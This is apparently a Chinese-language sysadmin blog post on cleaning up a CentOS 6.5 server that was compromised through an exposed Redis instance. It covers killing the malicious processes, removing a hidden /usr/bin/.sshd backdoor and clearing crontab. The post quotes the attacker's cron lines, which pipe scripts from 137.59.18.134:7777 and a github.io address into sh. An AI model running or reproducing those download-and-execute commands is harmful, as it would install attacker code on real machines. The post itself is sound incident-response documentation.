Centos6.5入侵清理

       今天早上來，網站打不開。經過xshell打不開終端，好久纔打開。發現內存佔用率高達95%,loadavg 15  16  16

現狀：

1. 負載過高     15        15            16
2. 網站打不開，shell進去緩慢，執行明令響應太慢

分析：

       記得緩存用的是reids3.07(有漏洞，對IP過濾不嚴謹致使的)，須要綁定IP便可

解決：

    redis.conf 

    bind 127.0.0.1 10.104.0.10

   ./redis-server ../redis.conf &

    ./redis-cli  

     flushdb    ###清空緩存

郵件

/var/spool/mail/root

 

From: root@VM_178_10_centos.localdomain (Cron Daemon)
To: root@VM_178_10_centos.localdomain
Subject: Cron <root@VM_178_10_centos> /usr/bin/curl  -fsSL http://137.59.18.134:7777/setup.sh | sh

     能夠肯定主機被入侵了！在郵件中發現每隔1min執行一次下載腳本的動做

定時任務

crontab -l    ###發現定時任務不正常，不停地刷亂碼

/var/spool/cron/root

REDIS0006�     ###redis漏洞，入侵記錄

/var/spool/cron/crontabs/root

 REDIS0006  .....

*/2 * * * * curl https://zcsgogogogo.github.io/1|/bin/sh           ###痕跡

cpu/mem使用率

free -m

[root@centos ~]# free -m
                    total       used       free     shared    buffers     cached
Mem:          3830       3361        469          0        207       1070
-/+ buffers/cache:       2084       1746
Swap:            0          0          0

cat  /proc/loadavg

[root@centos ~]# cat    /proc/loadavg
0.00 0.00 0.00 1/587 22099     ###在入侵以前都是15+的

top

查看佔用CPU最高的程序

xxx5555

kill   -9  pid

追蹤到/tmp目錄

###後門、病毒文件，

xxx555

redif

wgsp

逐一在進程中查找，殺掉 kill -9 pid

rm -rf   /tmp/*    ###清空臨時目錄文件

查殺：

 

  再次crontab -l  ,仍然發現再繼續刷亂碼，說明問題沒有根本性解決

ps -ef | grep sh

發現     .sshd能夠進程    /usr/bin/.sshd   ### 通常bin目錄下沒有.xxx的可執行文件

kill  -9 pid

crontab -r

OK,問題解決了

load average: 0.00, 0.00, 0.00  ###降下來了

 總結-Linux入侵後的檢測修復

1. 查看佔用CPU和內存最高的進程
2. 查看定時任務crontab
3. 查看mail和日誌